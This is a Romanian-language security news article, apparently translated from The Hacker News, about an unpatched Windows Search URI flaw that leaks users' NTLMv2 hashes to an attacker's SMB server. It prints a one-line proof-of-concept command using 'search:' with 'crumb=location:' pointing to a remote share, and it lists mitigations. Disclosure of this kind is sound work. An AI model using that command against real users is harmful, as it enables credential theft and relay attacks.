O vulnerabilitate neremediată a Windows Search URI permite sustragerea de hash-uri NTLMv2
Sursă: https://thehackernews.com
Specialiștii din domeniul securității cibernetice au dezvăluit detalii despre o vulnerabilitate neremediată care ar putea fi exploatată pentru a dezvălui atacatorului hash-ul NTLMv2 al unui utilizator.
La fel ca în cazul CVE-2026-33829, care a afectat handler-ul URI ms-screensketch al instrumentului Windows Snipping Tool, noua vulnerabilitate identificată se află în handler-ul URI search:, potrivit specialiștilor.
CVE-2026-33829 se referă la o vulnerabilitate de spoofing care ar putea expune informații sensibile unui atacator. Aceasta a fost remediată de Microsoft în aprilie 2026.
Un atacator ar putea determina utilizatorul să acceseze un link malițios într-un browser web sau dintr-o altă sursă URL, prin încorporarea acestuia într-o pagină web sau într-un mesaj de e-mail, a menționat Microsoft în avizul său de la acea vreme.
Dacă utilizatorul accesează link-ul, adresa URL malițioasă poate determina computerul să se conecteze la un server SMB ales de atacator, ceea ce ar dezvălui hash-ul NTLMv2 al utilizatorului atacatorului, permițându-i sa folosească acest lucru pentru a se autentifica ca utilizator, a semnalat, de asemenea, Microsoft.
Mai exact, problema se datora faptului că modulul de gestionare a adreselor URI al aplicației Snipping Tool accepta un parametru filePath, nu îl valida și accesa orice cale UNC (Universal Naming Convention) care îi era transmisă. Acest lucru putea, la rândul său, să declanșeze autentificarea NTLM și să expună atacatorului hash-ul Net-NTLMv2 al utilizatorului.
Noua vulnerabilitate identificată permite obținerea aceluiași rezultat final folosind search: și crumb=location: în locul filePath, prin intermediul unei comenzi precum cea de mai jos:
start „” „search:query=test&crumb=location:\\10.0.1.100\share”
Ca urmare, o persoană rău intenționată ar putea folosi hash-ul obținut pentru a lansa atacuri de tip relay și a obține acces mai profund într-o rețea. În urma divulgării responsabile din 15 aprilie 2026, Microsoft a refuzat să remedieze problema, afirmând că doar cazurile cu severitate importantă și critică îndeplinesc criteriile noastre pentru remediere.
În absența unei soluții, se recomandă blocarea SMB-ului outbound (TCP/445 și TCP/139) pe host-urile care nu au nevoie de acesta, aplicarea semnării SMB astfel încât hash-urile capturate să nu poată fi retransmise către serviciile interne și dezactivarea NTLM acolo unde este cazul.
Sursă: https://thehackernews.com/2026/06/unpatched-windows-search-uri.html
